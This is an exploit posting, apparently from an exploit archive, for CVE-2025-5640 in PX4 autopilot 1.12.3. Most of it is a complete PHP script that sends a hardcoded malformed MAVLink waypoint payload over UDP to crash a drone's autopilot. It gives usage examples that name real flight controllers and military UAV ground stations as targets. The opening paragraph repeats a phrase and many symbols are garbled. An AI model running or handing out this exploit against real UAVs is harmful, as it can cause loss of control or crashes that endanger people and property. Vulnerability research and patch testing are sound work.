PX4 Military UAV Autopilot 1.12.3 Denial of Service

PX4 Military UAV Autopilot 1.12.3 was identified with a critical PX4 Military UAV Autopilot 1.12.3 was identified with a critical Denial of Service (DoS) vulnerability. This flaw could allow an attacker to render military unmanned aerial vehicles (UAVs) unresponsive, potentially leading to a loss of control, mission failure, or even a crash. The vulnerability poses significant operational and safety risks, highlighting the importance of promptly updating to a patched version to mitigate this serious threat.

=============================================================================================================================================
| # Title : PX4 Military UAV Autopilot 1.12.3 Remote DoS Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://docs.px4.io/v1.12/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/202894/ & CVE-2025-5640

[+] Summary : This PoC exploits a Stack-Based Buffer Overflow vulnerability in PX4 Military UAV Autopilot versions up to 1.12.3,
allowing an attacker to send a poorly formatted MAVLink message of type:
TRAJECTORY_REPRESENTATION_WAYPOINTS to cause a complete failure (Denial of Service) of the UAV's autopilot.
The PoC works by sending a malicious MAVLink payload via UDP to the common control port (14540?14550).
Receiving data exceeding the expected size overwrites the stack memory, causing the autopilot to malfunction
and the aircraft to enter Failsafe mode or lose connectivity entirely.


[+] POC : php poc.php

<?php
/**
* Author: indoushka
* Description:
* Stack-based buffer overflow vulnerability in PX4 Military UAV Autopilot <=1.12.3
* triggered via malformed MAVLink TRAJECTORY_REPRESENTATION_WAYPOINTS message.
*/

class PX4UAVExploit {
private $targetIp;
private $targetPort;
private $timeout;
private $verbose;

// Malformed MAVLink hex payload
private $hexPayload = "fdef0000dcea6f4c01006de9d06a0548182a1fcc8b7cc542eb8945a54baa92ee908db9af0195bb5dce5f9ab613be912485d34e577c352c5cdc06592484be1aecd64a07127bda31fc8f41f300a9e4a0eab80d8835f106924f0b89ece3e256dda30e3001f07df4e1633e6f827b7812731dbc3daf1e81fc06cea4d9c8c1525fb955d3eddd7454b54bb740bcd87b00063bd9111d4fb4149658d4ccd92974c97c7158189a8d6";

public function __construct($ip = "127.0.0.1", $port = 14540, $timeout = 5, $verbose = false) {
$this->targetIp = $ip;
$this->targetPort = $port;
$this->timeout = $timeout;
$this->verbose = $verbose;
}

public function run($mode = "dos") {
$this->showBanner();

try {
switch ($mode) {
case "check":
$this->checkConnection();
break;
case "dos":
$this->executeDos();
break;
default:
$this->error("Unknown mode: $mode");
return;
}
} catch (Exception $e) {
$this->error("Execution failed: " . $e->getMessage());
}
}

private function checkConnection() {
$this->info("Testing connection to PX4 autopilot...");
$this->info("Target: {$this->targetIp}:{$this->targetPort}");

// Create UDP socket
$socket = $this->createUdpSocket();
if (!$socket) {
$this->error("Failed to create UDP socket");
return;
}

// Send heartbeat check
$heartbeat = $this->createMavlinkHeartbeat();
$result = socket_sendto($socket, $heartbeat, strlen($heartbeat), 0, $this->targetIp, $this->targetPort);

if ($result === false) {
$this->error("Failed to send heartbeat");
} else {
$this->info("Heartbeat sent successfully");

// Wait for response
socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array('sec' => $this->timeout, 'usec' => 0));

$response = '';
$from = '';
$port = 0;
$bytes = socket_recvfrom($socket, $response, 1024, 0, $from, $port);

if ($bytes > 0) {
$this->success("PX4 autopilot is responsive! Received $bytes bytes from $from:$port");
$this->info("Connection test PASSED");
} else {
$this->warning("No response received - PX4 may be offline or not listening");
}
}

socket_close($socket);
}

private function executeDos() {
$this->warning("? LAUNCHING DENIAL OF SERVICE ATTACK ?");
$this->info("Target: {$this->targetIp}:{$this->targetPort}");
$this->info("This will crash the PX4 autopilot if vulnerable");

// Countdown
for ($i = 5; $i > 0; $i--) {
$this->info("Sending exploit in $i seconds... (Ctrl+C to abort)");
sleep(1);
}

$socket = $this->createUdpSocket();
if (!$socket) {
$this->error("Failed to create UDP socket for attack");
return;
}

// Convert hex payload to binary
$payload = hex2bin($this->hexPayload);
if (!$payload) {
$this->error("Failed to decode hex payload");
socket_close($socket);
return;
}

$this->info("Sending malformed MAVLink packet...");

// Send multiple packets for reliability
$packetsSent = 0;
for ($i = 0; $i < 3; $i++) {
$result = socket_sendto($socket, $payload, strlen($payload), 0, $this->targetIp, $this->targetPort);

if ($result === false) {
$this->error("Failed to send packet #" . ($i + 1));
} else {
$this->info("Packet #" . ($i + 1) . " sent successfully ($result bytes)");
$packetsSent++;
}

usleep(100000); // 100ms delay between packets
}

socket_close($socket);

if ($packetsSent > 0) {
$this->success("Exploit packets delivered successfully");
$this->warning("PX4 autopilot should crash if vulnerable to CVE-2025-5640");
$this->showPostExploitationInfo();
} else {
$this->error("No packets were sent successfully");
}
}

private function createUdpSocket() {
$socket = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
if ($socket === false) {
return false;
}

// Set socket options
socket_set_option($socket, SOL_SOCKET, SO_REUSEADDR, 1);
socket_set_option($socket, SOL_SOCKET, SO_SNDTIMEO, array('sec' => $this->timeout, 'usec' => 0));

return $socket;
}

private function createMavlinkHeartbeat() {
// Simple MAVLink heartbeat message (system ID 255, component ID 0)
$heartbeat = hex2bin("fe09000000ff0000000000000000000000000203d403");
return $heartbeat ?: '';
}

private function showPostExploitationInfo() {
$this->info("
? POST-EXPLOITATION ACTIONS:
??????????????????????????????????????????????????

1. Monitor UAV Status:
? Check if autopilot stopped responding
? Verify telemetry data interruption
? Observe flight controller behavior

2. Impact Assessment:
? Autopilot crash = UAV may enter failsafe mode
? Possible flight termination in worst case
? Ground station connection loss

3. Recovery Actions:
? Restart PX4 software
? Reboot flight controller
? Re-establish MAVLink connections

?? MITIGATION RECOMMENDATIONS:
? Update PX4 to version > 1.12.3
? Implement MAVLink message validation
? Use message authentication
? Network segmentation for UAV communications
");
}

private function showBanner() {
echo "
???????????????????????????????????????????????????????????????
? PX4 UAV AUTOPILOT EXPLOIT ?
? CVE-2025-5640 - Remote DoS Exploit ?
? ?
? Target: PX4 Military UAV Autopilot <= 1.12.3 ?
? Vulnerability: Stack-based Buffer Overflow ?
? Impact: Denial of Service (Autopilot Crash) ?
? Author: indoushka ?
? PHP Implementation ?
???????????????????????????????????????????????????????????????\n\n";
}

private function info($message) {
echo "?? [INFO] " . $message . "\n";
}

private function success($message) {
echo "? [SUCCESS] " . $message . "\n";
}

private function warning($message) {
echo "?? [WARNING] " . $message . "\n";
}

private function error($message) {
echo "? [ERROR] " . $message . "\n";
}
}

function showHelp() {
echo "
? PX4 UAV Autopilot DoS Exploit (CVE-2025-5640)
??????????????????????????????????????????????????

?? Usage:
php px4_exploit.php [OPTIONS]

? Options:
--ip Target IP address (default: 127.0.0.1)
--port Target UDP port (default: 14540)
--mode Operation mode: dos, check (default: dos)
--timeout Timeout in seconds (default: 5)
--help Show this help information

? Examples:
# Check connection to PX4
php px4_exploit.php --mode check --ip 192.168.1.100 --port 14550

# Launch DoS attack
php px4_exploit.php --mode dos --ip 192.168.1.100 --port 14550

# Attack local SITL instance
php px4_exploit.php --mode dos

?? LEGAL DISCLAIMER:
This tool is for authorized security testing only.
Do not use against systems you don't own or have permission to test.

Military UAV systems are critical infrastructure.
Unauthorized access may violate national and international laws.

? Technical Details:
? Vulnerability: Buffer overflow in MAVLink message handling
? Affected: PX4 Autopilot <= 1.12.3
? Protocol: MAVLink over UDP
? Port: Typically 14540-14550
? Impact: Autopilot crash ? UAV failsafe/termination

? Target Environments:
? PX4 SITL (Software In The Loop)
? Real PX4 flight controllers
? Military UAV ground control stations
? Drone testing laboratories
\n";
}

function parseArguments($argv) {
$options = [
'ip' => '127.0.0.1',
'port' => 14540,
'mode' => 'dos',
'timeout' => 5,
'help' => false
];

for ($i = 1; $i < count($argv); $i++) {
switch ($argv[$i]) {
case '--ip':
$options['ip'] = $argv[++$i] ?? '127.0.0.1';
break;
case '--port':
$options['port'] = intval($argv[++$i] ?? 14540);
break;
case '--mode':
$options['mode'] = $argv[++$i] ?? 'dos';
break;
case '--timeout':
$options['timeout'] = intval($argv[++$i] ?? 5);
break;
case '--help':
$options['help'] = true;
break;
}
}

return $options;
}

// Main execution
if (php_sapi_name() !== 'cli') {
die("? This script must be run from command line\n");
}

$options = parseArguments($argv);

if ($options['help']) {
showHelp();
exit(0);
}

// Validate mode
if (!in_array($options['mode'], ['dos', 'check'])) {
echo "? Invalid mode. Use 'dos' or 'check'\n";
showHelp();
exit(1);
}

// Validate IP address
if (!filter_var($options['ip'], FILTER_VALIDATE_IP)) {
echo "? Invalid IP address: {$options['ip']}\n";
exit(1);
}

// Validate port
if ($options['port'] < 1 || $options['port'] > 65535) {
echo "? Invalid port number: {$options['port']}\n";
exit(1);
}

try {
$exploit = new PX4UAVExploit(
$options['ip'],
$options['port'],
$options['timeout'],
true
);

$exploit->run($options['mode']);

} catch (Exception $e) {
echo "? Fatal error: " . $e->getMessage() . "\n";
exit(1);
}
?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================